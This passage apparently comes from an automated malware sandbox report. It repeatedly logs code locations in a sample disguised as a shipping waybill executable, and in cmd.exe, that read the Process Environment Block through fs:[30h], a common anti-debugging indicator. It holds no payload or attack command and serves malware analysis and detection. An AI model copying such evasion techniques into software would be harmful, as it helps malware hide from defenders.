      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3D002D mov eax, dword ptr fs:[00000030h]11_2_1E3D002D
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3D002D mov eax, dword ptr fs:[00000030h]11_2_1E3D002D
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3D002D mov eax, dword ptr fs:[00000030h]11_2_1E3D002D
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3BB02A mov eax, dword ptr fs:[00000030h]11_2_1E3BB02A
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3BB02A mov eax, dword ptr fs:[00000030h]11_2_1E3BB02A
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3BB02A mov eax, dword ptr fs:[00000030h]11_2_1E3BB02A
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3BB02A mov eax, dword ptr fs:[00000030h]11_2_1E3BB02A
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3DBC2C mov eax, dword ptr fs:[00000030h]11_2_1E3DBC2C
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E43C450 mov eax, dword ptr fs:[00000030h]11_2_1E43C450
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E43C450 mov eax, dword ptr fs:[00000030h]11_2_1E43C450
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E471074 mov eax, dword ptr fs:[00000030h]11_2_1E471074
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E462073 mov eax, dword ptr fs:[00000030h]11_2_1E462073
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E461C06 mov eax, dword ptr fs:[00000030h]11_2_1E461C06
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E461C06 mov eax, dword ptr fs:[00000030h]11_2_1E461C06
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E461C06 mov eax, dword ptr fs:[00000030h]11_2_1E461C06
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E461C06 mov eax, dword ptr fs:[00000030h]11_2_1E461C06
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E461C06 mov eax, dword ptr fs:[00000030h]11_2_1E461C06
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E461C06 mov eax, dword ptr fs:[00000030h]11_2_1E461C06
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E461C06 mov eax, dword ptr fs:[00000030h]11_2_1E461C06
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E461C06 mov eax, dword ptr fs:[00000030h]11_2_1E461C06
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E461C06 mov eax, dword ptr fs:[00000030h]11_2_1E461C06
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E461C06 mov eax, dword ptr fs:[00000030h]11_2_1E461C06
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E461C06 mov eax, dword ptr fs:[00000030h]11_2_1E461C06
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E461C06 mov eax, dword ptr fs:[00000030h]11_2_1E461C06
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E461C06 mov eax, dword ptr fs:[00000030h]11_2_1E461C06
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E461C06 mov eax, dword ptr fs:[00000030h]11_2_1E461C06
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E426C0A mov eax, dword ptr fs:[00000030h]11_2_1E426C0A
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E426C0A mov eax, dword ptr fs:[00000030h]11_2_1E426C0A
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E426C0A mov eax, dword ptr fs:[00000030h]11_2_1E426C0A
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E426C0A mov eax, dword ptr fs:[00000030h]11_2_1E426C0A
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E47740D mov eax, dword ptr fs:[00000030h]11_2_1E47740D
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E47740D mov eax, dword ptr fs:[00000030h]11_2_1E47740D
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E47740D mov eax, dword ptr fs:[00000030h]11_2_1E47740D
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3C746D mov eax, dword ptr fs:[00000030h]11_2_1E3C746D
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E474015 mov eax, dword ptr fs:[00000030h]11_2_1E474015
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E474015 mov eax, dword ptr fs:[00000030h]11_2_1E474015
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E427016 mov eax, dword ptr fs:[00000030h]11_2_1E427016
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E427016 mov eax, dword ptr fs:[00000030h]11_2_1E427016
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E427016 mov eax, dword ptr fs:[00000030h]11_2_1E427016
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3C0050 mov eax, dword ptr fs:[00000030h]11_2_1E3C0050
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3C0050 mov eax, dword ptr fs:[00000030h]11_2_1E3C0050
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3DA44B mov eax, dword ptr fs:[00000030h]11_2_1E3DA44B
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3DF0BF mov ecx, dword ptr fs:[00000030h]11_2_1E3DF0BF
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3DF0BF mov eax, dword ptr fs:[00000030h]11_2_1E3DF0BF
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3DF0BF mov eax, dword ptr fs:[00000030h]11_2_1E3DF0BF
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E478CD6 mov eax, dword ptr fs:[00000030h]11_2_1E478CD6
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3E90AF mov eax, dword ptr fs:[00000030h]11_2_1E3E90AF
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E43B8D0 mov eax, dword ptr fs:[00000030h]11_2_1E43B8D0
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E43B8D0 mov ecx, dword ptr fs:[00000030h]11_2_1E43B8D0
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E43B8D0 mov eax, dword ptr fs:[00000030h]11_2_1E43B8D0
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E43B8D0 mov eax, dword ptr fs:[00000030h]11_2_1E43B8D0
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E43B8D0 mov eax, dword ptr fs:[00000030h]11_2_1E43B8D0
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E43B8D0 mov eax, dword ptr fs:[00000030h]11_2_1E43B8D0
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]11_2_1E3D20A0
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]11_2_1E3D20A0
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]11_2_1E3D20A0
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]11_2_1E3D20A0
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]11_2_1E3D20A0
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]11_2_1E3D20A0
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3B849B mov eax, dword ptr fs:[00000030h]11_2_1E3B849B
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E426CF0 mov eax, dword ptr fs:[00000030h]11_2_1E426CF0
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E426CF0 mov eax, dword ptr fs:[00000030h]11_2_1E426CF0
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E426CF0 mov eax, dword ptr fs:[00000030h]11_2_1E426CF0
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3A9080 mov eax, dword ptr fs:[00000030h]11_2_1E3A9080
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E4614FB mov eax, dword ptr fs:[00000030h]11_2_1E4614FB
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E423884 mov eax, dword ptr fs:[00000030h]11_2_1E423884
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E423884 mov eax, dword ptr fs:[00000030h]11_2_1E423884
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3A58EC mov eax, dword ptr fs:[00000030h]11_2_1E3A58EC
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E423540 mov eax, dword ptr fs:[00000030h]11_2_1E423540
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3D4D3B mov eax, dword ptr fs:[00000030h]11_2_1E3D4D3B
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3D4D3B mov eax, dword ptr fs:[00000030h]11_2_1E3D4D3B
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3D4D3B mov eax, dword ptr fs:[00000030h]11_2_1E3D4D3B
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3D513A mov eax, dword ptr fs:[00000030h]11_2_1E3D513A
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3D513A mov eax, dword ptr fs:[00000030h]11_2_1E3D513A
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3AAD30 mov eax, dword ptr fs:[00000030h]11_2_1E3AAD30
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]11_2_1E3B3D34
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]11_2_1E3B3D34
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]11_2_1E3B3D34
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]11_2_1E3B3D34
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]11_2_1E3B3D34
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]11_2_1E3B3D34
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]11_2_1E3B3D34
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]11_2_1E3B3D34
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]11_2_1E3B3D34
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]11_2_1E3B3D34
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]11_2_1E3B3D34
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]11_2_1E3B3D34
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]11_2_1E3B3D34
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3C4120 mov eax, dword ptr fs:[00000030h]11_2_1E3C4120
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3C4120 mov eax, dword ptr fs:[00000030h]11_2_1E3C4120
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3C4120 mov eax, dword ptr fs:[00000030h]11_2_1E3C4120
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3C4120 mov eax, dword ptr fs:[00000030h]11_2_1E3C4120
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3C4120 mov ecx, dword ptr fs:[00000030h]11_2_1E3C4120
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3A9100 mov eax, dword ptr fs:[00000030h]11_2_1E3A9100
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3A9100 mov eax, dword ptr fs:[00000030h]11_2_1E3A9100
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3A9100 mov eax, dword ptr fs:[00000030h]11_2_1E3A9100
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3AB171 mov eax, dword ptr fs:[00000030h]11_2_1E3AB171
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3AB171 mov eax, dword ptr fs:[00000030h]11_2_1E3AB171
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3CC577 mov eax, dword ptr fs:[00000030h]11_2_1E3CC577
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3CC577 mov eax, dword ptr fs:[00000030h]11_2_1E3CC577
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3AC962 mov eax, dword ptr fs:[00000030h]11_2_1E3AC962
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3C7D50 mov eax, dword ptr fs:[00000030h]11_2_1E3C7D50
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E478D34 mov eax, dword ptr fs:[00000030h]11_2_1E478D34
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E42A537 mov eax, dword ptr fs:[00000030h]11_2_1E42A537
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3CB944 mov eax, dword ptr fs:[00000030h]11_2_1E3CB944
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3CB944 mov eax, dword ptr fs:[00000030h]11_2_1E3CB944
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3E3D43 mov eax, dword ptr fs:[00000030h]11_2_1E3E3D43
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3D1DB5 mov eax, dword ptr fs:[00000030h]11_2_1E3D1DB5
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3D1DB5 mov eax, dword ptr fs:[00000030h]11_2_1E3D1DB5
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3D1DB5 mov eax, dword ptr fs:[00000030h]11_2_1E3D1DB5
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E426DC9 mov eax, dword ptr fs:[00000030h]11_2_1E426DC9
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E426DC9 mov eax, dword ptr fs:[00000030h]11_2_1E426DC9
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E426DC9 mov eax, dword ptr fs:[00000030h]11_2_1E426DC9
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E426DC9 mov ecx, dword ptr fs:[00000030h]11_2_1E426DC9
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E426DC9 mov eax, dword ptr fs:[00000030h]11_2_1E426DC9
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E426DC9 mov eax, dword ptr fs:[00000030h]11_2_1E426DC9
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3D35A1 mov eax, dword ptr fs:[00000030h]11_2_1E3D35A1
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3D61A0 mov eax, dword ptr fs:[00000030h]11_2_1E3D61A0
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3D61A0 mov eax, dword ptr fs:[00000030h]11_2_1E3D61A0
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3DFD9B mov eax, dword ptr fs:[00000030h]11_2_1E3DFD9B
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3DFD9B mov eax, dword ptr fs:[00000030h]11_2_1E3DFD9B
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E4341E8 mov eax, dword ptr fs:[00000030h]11_2_1E4341E8
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3D2990 mov eax, dword ptr fs:[00000030h]11_2_1E3D2990
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]11_2_1E3A2D8A
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]11_2_1E3A2D8A
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]11_2_1E3A2D8A
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]11_2_1E3A2D8A
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]11_2_1E3A2D8A
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E458DF1 mov eax, dword ptr fs:[00000030h]11_2_1E458DF1
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3DA185 mov eax, dword ptr fs:[00000030h]11_2_1E3DA185
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3D2581 mov eax, dword ptr fs:[00000030h]11_2_1E3D2581
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3D2581 mov eax, dword ptr fs:[00000030h]11_2_1E3D2581
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3D2581 mov eax, dword ptr fs:[00000030h]11_2_1E3D2581
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3D2581 mov eax, dword ptr fs:[00000030h]11_2_1E3D2581
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3CC182 mov eax, dword ptr fs:[00000030h]11_2_1E3CC182
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3AB1E1 mov eax, dword ptr fs:[00000030h]11_2_1E3AB1E1
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3AB1E1 mov eax, dword ptr fs:[00000030h]11_2_1E3AB1E1
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3AB1E1 mov eax, dword ptr fs:[00000030h]11_2_1E3AB1E1
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3BD5E0 mov eax, dword ptr fs:[00000030h]11_2_1E3BD5E0
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3BD5E0 mov eax, dword ptr fs:[00000030h]11_2_1E3BD5E0
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E4269A6 mov eax, dword ptr fs:[00000030h]11_2_1E4269A6
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E4705AC mov eax, dword ptr fs:[00000030h]11_2_1E4705AC
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E4705AC mov eax, dword ptr fs:[00000030h]11_2_1E4705AC
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E4251BE mov eax, dword ptr fs:[00000030h]11_2_1E4251BE
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E4251BE mov eax, dword ptr fs:[00000030h]11_2_1E4251BE
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E4251BE mov eax, dword ptr fs:[00000030h]11_2_1E4251BE
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E4251BE mov eax, dword ptr fs:[00000030h]11_2_1E4251BE
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_005641AF mov eax, dword ptr fs:[00000030h]11_2_005641AF
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_005686DF mov eax, dword ptr fs:[00000030h]11_2_005686DF
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_005686B3 mov eax, dword ptr fs:[00000030h]11_2_005686B3
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_0056874B mov eax, dword ptr fs:[00000030h]11_2_0056874B
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_0056878B mov eax, dword ptr fs:[00000030h]11_2_0056878B
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_00567955 mov eax, dword ptr fs:[00000030h]11_2_00567955
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_00566D7F mov eax, dword ptr fs:[00000030h]11_2_00566D7F
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0017B5E0 mov eax, dword ptr fs:[00000030h]14_2_0017B5E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0314FF10 mov eax, dword ptr fs:[00000030h]14_2_0314FF10
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0314FF10 mov eax, dword ptr fs:[00000030h]14_2_0314FF10
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0317131B mov eax, dword ptr fs:[00000030h]14_2_0317131B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0318070D mov eax, dword ptr fs:[00000030h]14_2_0318070D
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0318070D mov eax, dword ptr fs:[00000030h]14_2_0318070D
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030B4F2E mov eax, dword ptr fs:[00000030h]14_2_030B4F2E
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030B4F2E mov eax, dword ptr fs:[00000030h]14_2_030B4F2E
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030EE730 mov eax, dword ptr fs:[00000030h]14_2_030EE730
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03188B58 mov eax, dword ptr fs:[00000030h]14_2_03188B58
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030BDB40 mov eax, dword ptr fs:[00000030h]14_2_030BDB40
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030CEF40 mov eax, dword ptr fs:[00000030h]14_2_030CEF40
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030BF358 mov eax, dword ptr fs:[00000030h]14_2_030BF358
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030BDB60 mov ecx, dword ptr fs:[00000030h]14_2_030BDB60
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030CFF60 mov eax, dword ptr fs:[00000030h]14_2_030CFF60
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03188F6A mov eax, dword ptr fs:[00000030h]14_2_03188F6A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030E3B7A mov eax, dword ptr fs:[00000030h]14_2_030E3B7A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030E3B7A mov eax, dword ptr fs:[00000030h]14_2_030E3B7A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030C1B8F mov eax, dword ptr fs:[00000030h]14_2_030C1B8F
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030C1B8F mov eax, dword ptr fs:[00000030h]14_2_030C1B8F
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03137794 mov eax, dword ptr fs:[00000030h]14_2_03137794
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03137794 mov eax, dword ptr fs:[00000030h]14_2_03137794
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03137794 mov eax, dword ptr fs:[00000030h]14_2_03137794
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0316D380 mov ecx, dword ptr fs:[00000030h]14_2_0316D380
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0317138A mov eax, dword ptr fs:[00000030h]14_2_0317138A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030EB390 mov eax, dword ptr fs:[00000030h]14_2_030EB390
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03185BA5 mov eax, dword ptr fs:[00000030h]14_2_03185BA5
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030BC600 mov eax, dword ptr fs:[00000030h]14_2_030BC600
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030BC600 mov eax, dword ptr fs:[00000030h]14_2_030BC600
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030BC600 mov eax, dword ptr fs:[00000030h]14_2_030BC600
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030D3A1C mov eax, dword ptr fs:[00000030h]14_2_030D3A1C
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0316FE3F mov eax, dword ptr fs:[00000030h]14_2_0316FE3F
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030BE620 mov eax, dword ptr fs:[00000030h]14_2_030BE620
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030B9240 mov eax, dword ptr fs:[00000030h]14_2_030B9240
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030B9240 mov eax, dword ptr fs:[00000030h]14_2_030B9240
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030B9240 mov eax, dword ptr fs:[00000030h]14_2_030B9240
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030B9240 mov eax, dword ptr fs:[00000030h]14_2_030B9240
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030C7E41 mov eax, dword ptr fs:[00000030h]14_2_030C7E41
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030C7E41 mov eax, dword ptr fs:[00000030h]14_2_030C7E41
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030C7E41 mov eax, dword ptr fs:[00000030h]14_2_030C7E41
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030C7E41 mov eax, dword ptr fs:[00000030h]14_2_030C7E41
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030C7E41 mov eax, dword ptr fs:[00000030h]14_2_030C7E41
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030C7E41 mov eax, dword ptr fs:[00000030h]14_2_030C7E41
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030C766D mov eax, dword ptr fs:[00000030h]14_2_030C766D
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030F927A mov eax, dword ptr fs:[00000030h]14_2_030F927A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0316B260 mov eax, dword ptr fs:[00000030h]14_2_0316B260
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0316B260 mov eax, dword ptr fs:[00000030h]14_2_0316B260
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03188A62 mov eax, dword ptr fs:[00000030h]14_2_03188A62
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030DAE73 mov eax, dword ptr fs:[00000030h]14_2_030DAE73
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030DAE73 mov eax, dword ptr fs:[00000030h]14_2_030DAE73
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030DAE73 mov eax, dword ptr fs:[00000030h]14_2_030DAE73
